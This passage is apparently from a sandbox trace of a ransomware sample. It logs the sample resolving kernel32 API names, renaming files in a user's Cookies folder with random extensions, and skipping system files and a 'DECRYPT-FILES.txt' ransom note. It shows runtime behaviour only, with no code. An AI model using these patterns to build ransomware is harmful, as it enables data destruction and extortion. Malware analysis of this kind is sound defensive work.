lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0180.996] lstrlenA (lpString="CREATEFIBER") returned 11 [0180.996] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0180.996] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0180.996] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0180.996] lstrlenA (lpString="CREATEFILEA") returned 11 [0180.996] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0180.996] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0180.996] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0180.996] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0180.996] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0180.996] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0180.996] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0180.996] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0180.996] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0180.996] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0180.996] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0180.996] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0180.996] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0180.996] lstrlenA (lpString="CREATEFILEW") returned 11 [0180.996] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0180.996] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0180.996] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0180.996] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0180.996] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0180.996] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0180.996] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0180.996] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0180.996] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0180.996] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0180.996] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0180.996] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0180.997] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0180.997] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0180.997] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0180.997] lstrlenA (lpString="CREATEJOBSET") returned 12 [0180.997] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0180.997] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0180.997] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0180.997] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0180.997] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0180.997] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0180.997] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0180.997] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0180.997] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0180.997] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0180.997] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0180.997] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0180.997] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0180.997] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0180.997] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0180.997] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0180.997] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0180.997] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0180.997] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0180.997] lstrlenA (lpString="CREATEPIPE") returned 10 [0180.997] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0180.997] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0180.997] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0180.997] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0180.997] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0180.997] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0180.997] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0180.997] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0180.997] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0180.997] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0180.997] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0180.997] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0180.997] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0180.997] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0180.997] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0180.998] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0180.998] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0180.998] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0180.998] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0180.998] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0180.998] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0180.998] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0180.998] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0180.998] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0180.998] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0180.998] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0180.998] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0180.998] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0180.998] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0180.998] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0180.998] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0180.998] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0180.998] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0180.998] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0180.998] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0180.998] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0180.998] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0180.998] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0180.998] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0180.998] lstrlenA (lpString="CREATETHREAD") returned 12 [0180.998] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0180.998] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0180.998] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0180.998] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0180.998] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0180.998] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0180.998] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0180.998] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0180.998] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0180.998] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0180.998] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0180.998] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0180.999] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0180.999] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0180.999] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0180.999] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0180.999] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0180.999] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0180.999] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0180.999] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0180.999] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0180.999] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0180.999] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0180.999] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0180.999] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0180.999] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0180.999] lstrcpyA (in: lpString1=0x36fce30, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0180.999] lstrlenA (lpString="CTRLROUTINE") returned 11 [0180.999] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0180.999] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0180.999] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0180.999] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0180.999] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0180.999] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0180.999] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0180.999] lstrlenA (lpString="DEBUGBREAK") returned 10 [0180.999] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0180.999] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0180.999] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0180.999] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0180.999] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0180.999] lstrlenA (lpString="DECODEPOINTER") returned 13 [0180.999] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0180.999] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0180.999] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0180.999] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0180.999] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0180.999] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0180.999] lstrcpyA (in: lpString1=0x36fce30, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0180.999] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0181.000] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0181.000] lstrlenA (lpString="DELETEATOM") returned 10 [0181.000] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0181.000] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0181.000] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0181.000] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0181.000] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0181.000] lstrlenA (lpString="DELETEFIBER") returned 11 [0181.000] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0181.000] lstrlenA (lpString="DELETEFILEA") returned 11 [0181.000] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0181.000] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0181.000] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0181.000] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0181.000] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0181.000] lstrlenA (lpString="DELETEFILEW") returned 11 [0181.000] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0181.000] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0181.000] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0181.000] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0181.000] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0181.000] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0181.000] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0181.000] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0181.000] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0181.000] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0181.000] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0181.000] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0181.000] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0181.000] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0181.000] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0181.001] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0181.001] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0181.001] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0181.001] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0181.001] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0181.001] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0181.001] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0181.001] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0181.001] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0181.001] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0181.001] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0181.001] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0181.001] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0181.001] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0181.001] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0181.001] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0181.001] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0181.001] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0181.001] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0181.001] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0181.001] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0181.001] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0181.001] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0181.001] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0181.001] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0181.001] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0181.001] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0181.001] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0181.001] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0181.001] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0181.001] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0181.001] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0181.001] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0181.001] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0181.001] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0181.001] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0181.001] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0181.001] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0181.001] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0181.002] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0181.002] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0181.002] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0181.002] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0181.002] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0181.002] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0181.002] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0181.002] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0181.002] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0181.002] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0181.002] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0181.002] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0181.002] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0181.002] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0181.002] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13FyW") returned 117 [0181.002] wsprintfW (in: param_1=0x36fdae8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13FyW.n4M3") returned 122 [0181.002] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13FyW" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13fyw"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13FyW.n4M3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13fyw.n4m3"), dwFlags=0x0) returned 1 [0181.003] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.003] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.003] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.003] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1dcf9270, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1dcf9270, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xab3ab520, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x176, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@everesttech[1].txt.QaHC", cAlternateFileName="5P5NRG~1.QAH")) returned 1 [0181.003] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@everesttech[1].txt.QaHC", lpString2="DECRYPT-FILES.txt") returned -1 [0181.004] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@everesttech[1].txt.QaHC", lpString2="autorun.inf") returned -1 [0181.004] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@everesttech[1].txt.QaHC", lpString2="boot.ini") returned -1 [0181.004] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@everesttech[1].txt.QaHC", lpString2="desktop.ini") returned -1 [0181.004] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@everesttech[1].txt.QaHC", lpString2="ntuser.dat") returned -1 [0181.004] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@everesttech[1].txt.QaHC", lpString2="iconcache.db") returned -1 